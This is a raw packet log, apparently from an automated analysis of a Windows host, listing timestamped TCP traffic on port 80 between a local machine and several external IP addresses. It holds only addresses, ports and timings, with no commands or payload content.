Jul 2, 2024 00:05:08.096419096 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096430063 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096431017 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096431017 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096441031 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096451998 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096462011 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096493006 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096493006 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096679926 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096690893 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096700907 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096712112 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096721888 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096730947 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096731901 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096741915 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096752882 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096765041 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096765995 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096765995 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096776009 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096786022 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096786022 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096797943 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096807957 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096822977 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096843004 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096867085 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097085953 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097098112 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097109079 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097119093 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097130060 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097140074 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097142935 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097142935 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097148895 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097160101 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097170115 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097178936 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097178936 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097191095 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097199917 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097202063 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097212076 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097223997 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097228050 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097249031 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097273111 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097368956 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097440004 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097512960 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097523928 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097534895 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097546101 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097556114 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097567081 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097568035 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097568035 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097578049 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097589016 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097599030 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097608089 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097621918 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097621918 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097625017 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097642899 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097655058 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097665071 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097675085 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097681999 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097682953 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097686052 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097687006 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.097697020 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.097708941 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097719908 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097729921 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097740889 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097749949 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097757101 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097757101 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.097759008 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.097759008 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.097760916 CEST	80	49733	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.097771883 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097781897 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097791910 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097794056 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.097803116 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097815037 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097825050 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097836971 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.097839117 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.097871065 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.097871065 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.098731041 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098743916 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098752975 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098763943 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098774910 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098786116 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098790884 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.098790884 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.098798037 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098809958 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098820925 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098829031 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.098831892 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098845005 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098850012 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.098872900 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098875999 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.098882914 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.098886013 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098896980 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098915100 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098917007 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.098925114 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098941088 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098942995 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.098953009 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098958969 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.098965883 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098975897 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098987103 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.098990917 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.098999023 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.099009991 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.099014997 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.099014997 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.099023104 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.099034071 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.099044085 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.099045038 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.099057913 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.099067926 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.099067926 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.099080086 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.099090099 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.099095106 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.099095106 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.099119902 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.099148989 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.099406958 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.099419117 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.099427938 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.099437952 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.099447966 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099457979 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099462986 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.099462986 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.099468946 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099479914 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099483013 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.099484921 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099488020 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.099494934 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099504948 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099515915 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099522114 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.099529028 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099534035 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.099540949 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099551916 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099560976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099562883 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.099562883 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.099571943 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099581003 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099591970 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099601030 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.099607944 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099617958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099618912 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.099618912 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.099628925 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099638939 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099642992 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.099647999 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099658012 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099668026 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.099668980 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099678040 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099689960 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099699974 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099703074 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.099703074 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.099709988 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.099718094 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.099756002 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.099756002 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.100358963 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.100370884 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.100379944 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.100392103 CEST	80	49726	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.100400925 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100409031 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.100409985 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.100409985 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.100411892 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100420952 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100433111 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100442886 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100452900 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.100460052 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100471020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100483894 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100498915 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.100498915 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.100500107 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100511074 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.100512981 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100524902 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100536108 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.100538015 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.100547075 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.100557089 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.100570917 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.100578070 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.100580931 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.100589991 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.100593090 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.100596905 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.100603104 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.100614071 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.100617886 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.100624084 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.100634098 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.100642920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.100650072 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.100650072 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.100652933 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100663900 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100673914 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100683928 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100694895 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.100703001 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.100703001 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.100733042 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.100733042 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101346970 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101358891 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101368904 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101378918 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101388931 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101392984 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101401091 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101406097 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101413012 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101423979 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101439953 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101440907 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101448059 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101454020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101464987 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101474047 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101484060 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101497889 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101497889 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101501942 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101516008 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101519108 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101526976 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101538897 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101550102 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101560116 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101561069 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101569891 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101581097 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101586103 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101598024 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101607084 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101613045 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101613045 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101619005 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101628065 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101632118 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101644039 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101654053 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101655960 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101665020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101675034 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101686001 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.101696014 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101696014 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.101721048 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.102283001 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.102293968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.102303982 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.102314949 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.102324963 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.102333069 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.102339029 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.102351904 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.102355003 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102365017 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102376938 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102387905 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102390051 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.102390051 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.102412939 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102415085 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.102427006 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102437019 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102447987 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102451086 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.102451086 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.102457047 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102468014 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102473021 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.102478981 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102489948 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102499962 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102509975 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.102509975 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.102510929 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102559090 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.102559090 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.102967978 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102979898 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.102989912 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103001118 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103010893 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103019953 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103025913 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.103025913 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.103030920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103041887 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103050947 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.103051901 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.103063107 CEST	80	49716	77.105.133.27	192.168.2.6
